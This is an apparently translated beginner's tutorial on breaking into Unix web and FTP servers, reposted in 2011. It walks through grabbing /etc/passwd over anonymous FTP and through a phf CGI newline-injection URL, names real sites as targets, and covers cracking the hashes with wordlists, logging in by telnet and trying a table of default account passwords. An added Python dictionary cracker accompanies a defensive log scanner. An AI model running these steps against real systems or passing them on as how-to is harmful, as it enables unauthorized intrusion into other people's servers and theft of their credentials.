
Friday, 11 November 2011

An Introduction to Server Hacking

Original by Lord Dredd; translated by Arthur Chen

Introduction:

Every day I get asked the same questions at least five times by people just starting out (beginning hackers): "How do I hack?" and "Is there a way to break into a web site?" Well, yes, there is! And not just one way; in fact there are hundreds of ways to break into a web site. Here I want to lay out a few of them so that beginners know where to start. Every hacker has their own way in, but going after web and ftp servers is one of the easiest. I will assume you already have basic knowledge of some UNIX operating system and of how a web server works, but I will touch on those things briefly for anyone who does not.

Part I: Basic UNIX commands

Most of the commands you use under DOS have equivalents on UNIX and Linux. The ones you will need most when using a shell account are:

HELP = man (for example, man ls shows the manual page for ls)
COPY = cp
MOVE = mv
DIR = ls
DEL = rm (there is no undelete)
CD = cd

To see who else is on the system, type who; to find out about a particular user, type finger. These basic UNIX commands let you learn about the system you are on.

Part II: Cracking passwords

On a UNIX system the passwords of every user are kept in a single file. It lives in the /etc directory and is called passwd. I bet you are thinking: "Great! All I have to do is grab this /etc/passwd file and I'm a hacker!" If you think that, you are dead wrong. The passwords in the passwd file are not stored as typed: each one has been run through a one-way function (crypt(3); the old documents call this "one-way encryption"), which means there is no way to turn the stored value back into the original password. There are, however, programs that get you the original passwords anyway. The best password cracker I have found is called Cracker Jack. It takes a dictionary file (a wordlist) of thousands of words, runs each word through the same one-way function, and compares the result with every stored password in the passwd file; as soon as one matches, it tells you. Cracker Jack can be found at my web site:

http://www.geocities.com/Silicon Valley/9185
(Translator's note: I went looking and it does not seem to be there any more; I suggest looking on a local site instead.)

Dictionary files (wordlists) can be found at the following ftp site:

ftp://sable.ox.ac.uk/pub/wordlists

I usually go to the American directory on that site and grab the dictionary file there. Once you are in, download this file:

dic-0294.tar.Z

It is about 4 MB and must be uncompressed before use; gzip (DOS) or WinZip (Windows) will do it, and you end up with a plain-text file of roughly 8 MB. It is best to put it in the same directory as the cracker. To learn how to use Cracker Jack, read the documentation that comes with the program.

Part III: The hard part (getting the password file)

So far I have only covered the easy part of breaking into a server; now for the harder part. Obviously, if the administrator has a file that holds every password, do you really think it will just be left lying around for you to pick up? You need a good way of getting the system's password file, /etc/passwd, without logging into the system. Here are two methods to try; with luck one will work.

Often the /etc directory is not locked down on the FTP server. Log in with an FTP client using the anonymous account, then check whether the passwd file in the /etc directory is readable. If anonymous users are not restricted, download it and run Cracker Jack on it straight away. If it is restricted, try Plan B.

On some systems the /cgi-bin directory contains a program called phf, and if the host you are going after has it, you are in luck. phf lets a remote user read files on the web server (including /etc/passwd). The reason it works is that phf strips shell metacharacters from its input but forgets the newline, so a URL-encoded newline (%0a) followed by a command gets run by the shell. To use it, type this into your browser:

http://xxx.xxx.xxx/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Replace xxx.xxx.xxx with the site you want to hack.

For example, to hack Saint Louis University (which I have already done) I used:
http://www.slu.edu/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Don't bother trying www.slu.edu again; I have already told them about the hole in their system.
Here is a tip though: www.spawn.com and www.garply.com.

If none of the methods above work, try whatever else you can think of. (The phf hole is from 1996 and was fixed long ago, so on anything maintained it will not be there.) One more thing: if the second field of the passwd file you obtain is x, ! or *, the password has been hidden from you. An x means the system uses shadow passwords: the hashes have been moved to /etc/shadow, which only root can read, precisely so that hackers and other unwelcome visitors cannot get them through holes like the ones above. A * or ! means the account is locked; no password hashes to those values at all. You will not read /etc/shadow without root, or without an administrator having left a world-readable copy of it lying around, so if you see an x in that field, look for such copies or move on to a different approach.
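As an added example that is not part of the original tutorial, here is the defender's side of the phf trick above: a small Python scanner that walks a web server access log, decodes the query string of each request and flags phf requests carrying a URL-encoded newline, which is the signature of this attack; it also marks a 200 response with a non-zero size on a /etc/passwd read as a probable leak. The log lines are constructed for this example (the timestamps and addresses are invented) and the function names are my own.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed Common Log Format lines for this example; not from a real server.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Nov/2011:10:01:12 +0800] "GET /index.html HTTP/1.0" 200 1042
10.0.0.9 - - [11/Nov/2011:10:02:40 +0800] "GET /cgi-bin/phf?Qalias=jones HTTP/1.0" 200 388
10.0.0.9 - - [11/Nov/2011:10:02:41 +0800] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 2011
10.0.0.9 - - [11/Nov/2011:10:02:42 +0800] "GET /cgi-bin/phf?Qalias=x%0A/bin/ls%20-la%20/etc HTTP/1.0" 200 0
10.0.0.7 - - [11/Nov/2011:10:03:00 +0800] "HEAD /cgi-bin/phf HTTP/1.0" 200 0
"""

# Common Log Format: ip ident user [time] "method target version" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\d+|-)'
)

def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def phf_injection(target: str):
    """Return the command smuggled into a phf request, or None.
    phf stripped shell metacharacters from its parameters but not the
    newline, so a decoded newline in any query value starts a second shell
    command.  Decoding first (%0a and %0A alike) is what keeps the check
    from being dodged by trivial case or encoding changes."""
    parts = urlsplit(target)
    if not parts.path.endswith("/phf"):
        return None
    for _, value in parse_qsl(parts.query, keep_blank_values=True):
        if "\n" in value:
            return value.split("\n", 1)[1].strip()
    return None

def scan(log_text: str) -> list:
    """Flag every phf newline injection in the log; 'leaked' is True when
    the server answered 200 with a body, i.e. the command output went out."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        cmd = phf_injection(rec["target"])
        if cmd is None:
            continue
        size = 0 if rec["size"] == "-" else int(rec["size"])
        hits.append({
            "ip": rec["ip"],
            "time": rec["ts"],
            "command": cmd,
            "leaked": rec["status"] == "200" and size > 0,
        })
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

On the sample log the benign lookup (Qalias=jones) and the bare HEAD probe are ignored; the two requests with an encoded newline are reported with the injected command, and only the passwd read, which returned 2011 bytes, is marked as leaked.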

Part IV: Logging into "your" new shell

OK! Now it is time to use the hard-won passwd file and the accounts and passwords that Cracker Jack spent all that time finding. Open your telnet client and telnet to the server you are going after (for example, www.slu.edu).

Once connected, the first thing you will usually see is some information about the operating system the server runs (typically UNIX, Linux, AIX, IRIX, Ultrix, BSD, or even DOS and VAX/VMS); then, when the login prompt appears, type the account and password you obtained right where the system asks for the login. From here you can use all your UNIX knowledge to make the system do whatever you want.
But remember: hacking is not about spreading viruses or wrecking other people's computer systems. Hacking is using your knowledge to gain more knowledge. Understood?

Part V: What newcomers need to know

Before you become a real hacker you must first work out what a hacker actually is, and be an ethical one. If you are only just starting out, first get familiar with how a UNIX environment works, then go to the library and find some books on how networked operating systems work, or go to a bookstore and read something on network security. Books like that usually describe how hackers break into systems, and you can learn a great deal from them.

Translator's note: this document is written in a plain, easy-to-follow way, but it seems too "introductory" and does not go very deep. I tried the two methods above on a number of sites and the success rate was very low; quite discouraging! Still, for a beginner it is a good "enlightenment" text; I got started by reading this very article.

A little more about the passwd file. A password file usually looks like this:

root:1234aaab:0:1:Operator:/:/bin/csh
nobody:*:12345:12345::/:
daemon:*:1:1::/:
sys:*:2:2::/:/bin/csh
sun:123456hhh:0:1:Operator:/:/bin/csh
bin:*:3:3::/bin:
uucp:*:4:8::/var/spool/uucppublic:
news:*:6:6::/var/spool/news:/bin/csh
audit:*:9:9::/etc/security/audit:/bin/csh
sync::1:1::/:/bin/sync
sysdiag:*:0:1:Old System Diagnostic:/usr/diag/sysdiag:/usr/diag/sysdiag/sysdiag
sundiag:*:0:1:System Diagnostic:/usr/diag/sundiag:/usr/diag/sundiag/sundiag
tom:456lll45uu:100:20::/home/tom:/bin/csh
john:456fff76Sl:101:20:john:/home/john:/bin/csh
henry:AusTs45Yus:102:20:henry:/home/henry:/bin/csh
harry:SyduSrd5sY:103:20:harry:/home/harry:/bin/csh
steven:GEs45Yds5Ry:104:20:steven:/home/steven:/bin/csh
+::0:0:::

Each line is split into fields by ":". Taking tom:456lll45uu:100:20:tom chang:/home/tom:/bin/csh as an example:

User name: tom
Password (one-way hash): 456lll45uu
UID (user number): 100
GID (group number): 20
Real name (GECOS field): tom chang
Home directory: /home/tom
Shell: /bin/csh

Notice that accounts such as nobody, daemon, sys, bin, uucp, news, audit, sysdiag and sundiag have * in the password field. Nothing hashes to *, so those accounts are effectively switched off: there is no way to log in as them with a password; they exist only to own files and run services. Look at the sync entry too: its password field is empty, which on a classic system means no password is asked for at all (its shell is /bin/sync, so you get a disk sync and a disconnect rather than a shell, but an empty field on a real user is a free login). The last line, +::0:0:::, is not an account but an NIS (yp) entry telling the system to pull further accounts from the network password map.

When a system is first installed it usually comes with some default accounts and passwords:

ACCOUNT        PASSWORD
-----------    ----------------
root           root
sys            sys / system / bin
bin            sys / bin
mountfsys      mountfsys
adm            adm
uucp           uucp
nuucp          anon
anon           anon
user           user
games          games
install        install
reboot         (used as a "command login")
demo           demo
umountfsys     umountfsys
sync           sync
admin          admin
guest          guest
daemon         daemon

Of these, root, mountfsys, umountfsys and install (and sometimes sync) are root-level accounts, that is, they carry sysop (system administrator) privileges: full control of the machine. When you try to log into a system, these original accounts and passwords are a very good place to start, especially if you run into an absent-minded administrator; you might find yourself root without quite understanding how.
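As an added example, not from the original tutorial and not Cracker Jack's code, the following Python ties together Part II, the passwd walk-through above and the default-account table: it parses passwd lines into their seven fields, classifies the password field (a hash, x, *, ! or empty), then runs a dictionary attack the way Part II describes it, hashing each word once per distinct salt and comparing it with every stored hash that shares that salt, after first trying the username itself, which is how default accounts fall. Python's crypt module is deprecated, so make_hash() stands in for crypt(3) with a salted SHA-256 in an invented $demo$ format; the sample passwd lines are built inline from known passwords so the example runs offline (the hashes are generated here and are not real), and the user names come from the listing on this page.

```python
import hashlib
from collections import defaultdict

def make_hash(salt: str, password: str) -> str:
    """Stand-in for crypt(3), in an invented $demo$<salt>$<hex> format.
    Real passwd entries use DES crypt (13 characters, salt in the first two);
    all that matters for the attack is that the function is one-way and salted."""
    digest = hashlib.sha256((salt + password).encode()).hexdigest()[:22]
    return f"$demo${salt}${digest}"

def classify(pw_field: str) -> str:
    """What the second field of a passwd line tells you."""
    if pw_field == "":
        return "empty"       # no password at all: a classic system asks for none
    if pw_field == "x":
        return "shadowed"    # real hash is in /etc/shadow, readable only by root
    if pw_field.startswith(("*", "!")):
        return "locked"      # nothing hashes to these, the account is disabled
    return "hash"            # a one-way hash you can attack offline

def parse_passwd(text: str) -> list:
    """Split passwd lines into user, hash, uid, gid, gecos, home, shell."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line[0] in "#+-":    # comment, NIS include (+) or exclude (-)
            continue
        fields = line.split(":")
        if len(fields) != 7:                # malformed line: skip it, do not guess
            continue
        user, pw, uid, gid, gecos, home, shell = fields
        entries.append({"user": user, "hash": pw, "kind": classify(pw),
                        "uid": int(uid), "gecos": gecos, "home": home,
                        "shell": shell})
    return entries

def salt_of(stored: str) -> str:
    return stored.split("$")[2]             # $demo$<salt>$<hex>

def crack(text: str, wordlist) -> dict:
    """Dictionary attack as Part II describes it.  Each word is hashed once
    per distinct salt and compared with every entry sharing that salt.  The
    username and the GECOS name are tried first, which is how default and
    'joe' accounts (password == login name) fall."""
    targets = [e for e in parse_passwd(text) if e["kind"] == "hash"]
    by_salt = defaultdict(list)
    for e in targets:
        by_salt[salt_of(e["hash"])].append(e)
    found = {}
    for e in targets:
        for guess in (e["user"], e["gecos"]):
            if guess and make_hash(salt_of(e["hash"]), guess) == e["hash"]:
                found[e["user"]] = guess
                break
    for word in wordlist:
        for salt, group in by_salt.items():
            candidate = make_hash(salt, word)       # one hash per (salt, word)
            for e in group:
                if e["user"] not in found and candidate == e["hash"]:
                    found[e["user"]] = word
    return found

# Constructed sample in the format shown above; hashes generated here, not real.
SAMPLE_PASSWD = "\n".join([
    "root:" + make_hash("aa", "toor") + ":0:1:Operator:/:/bin/csh",
    "nobody:*:12345:12345::/:",
    "daemon:*:1:1::/:",
    "sync::1:1::/:/bin/sync",
    "tom:" + make_hash("Xy", "hello") + ":100:20:tom chang:/home/tom:/bin/csh",
    "john:" + make_hash("Xy", "john") + ":101:20:john:/home/john:/bin/csh",
    "henry:" + make_hash("qz", "Tr0ub4dor&3") + ":102:20:henry:/home/henry:/bin/csh",
    "steven:x:104:20:steven:/home/steven:/bin/csh",
    "+::0:0:::",
])
WORDLIST = ["password", "hello", "toor", "letmein"]   # a four-word "dictionary"

if __name__ == "__main__":
    for e in parse_passwd(SAMPLE_PASSWD):
        print(f"{e['user']:8} {e['kind']}")
    print(crack(SAMPLE_PASSWD, WORDLIST))
```

Run against the sample, root and tom fall to the wordlist, john falls to the username guess, henry survives because his password is in no list, and steven is never attempted because his entry is shadowed. Grouping by salt is what made Cracker Jack fast on large files: with a two-character crypt salt there are at most 4096 distinct salts, so a wordlist is hashed at most 4096 times however many users share the file.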

Finally, one point: I am not a hacking expert. Don't ask me questions, because I won't know the answers either. I translated this article only to share what I learned, and I hope those with more experience will offer corrections. Here I also want to mention another introductory document:

UNIX: A Hacking Tutorial by Sir Hackalot

It is very well written and fairly long; some day when I have time I will translate it into Chinese and share it with everyone.

Mr Hackalot tells a story. He says people have been saying that hacking seems to be getting harder lately, for no other reason than that holes in systems keep being dug up by hackers, administrators patch them accordingly, and each new hack therefore gets harder. But our Sir Hackalot disagrees; he says:

In recent years a great many value added resellers have sprung up. Once a reseller and a buyer have agreed a deal, the reseller sets up the hardware, installs the UNIX operating system on it and hands it over to the buyer to close the sale; the typical buyer does not understand how UNIX works. When a hole in the system is found and it gets broken into, the buyer goes back to the reseller to patch it. The problem is that the reseller sells hardware and installs the operating system on the side; the people doing that installation do not necessarily know much about system security, and buyers rarely pay professionals to manage and maintain the system. So the holes stay right where they are, waiting for hackers to come through them. What do you make of that story? Of course Sir Hackalot is American and is describing the American situation; Taiwan may differ, but I doubt it differs by much. As far as I know, some schools buy their computers exactly this way: the people in charge of procurement do not necessarily understand this stuff; the vendor sets the machine up once the order comes in, gets the operating system running somehow and hands it to the school; but the person doing the setup may be nothing more than a salesperson who knows a little about installing an operating system and not much else, so by the time it reaches the school even the most basic system security may never have been considered. I think quite a few schools are like this, and ordinary companies setting up web sites probably do not pay it much more attention.

So then: hacking is not so difficult as you think, isn't it?
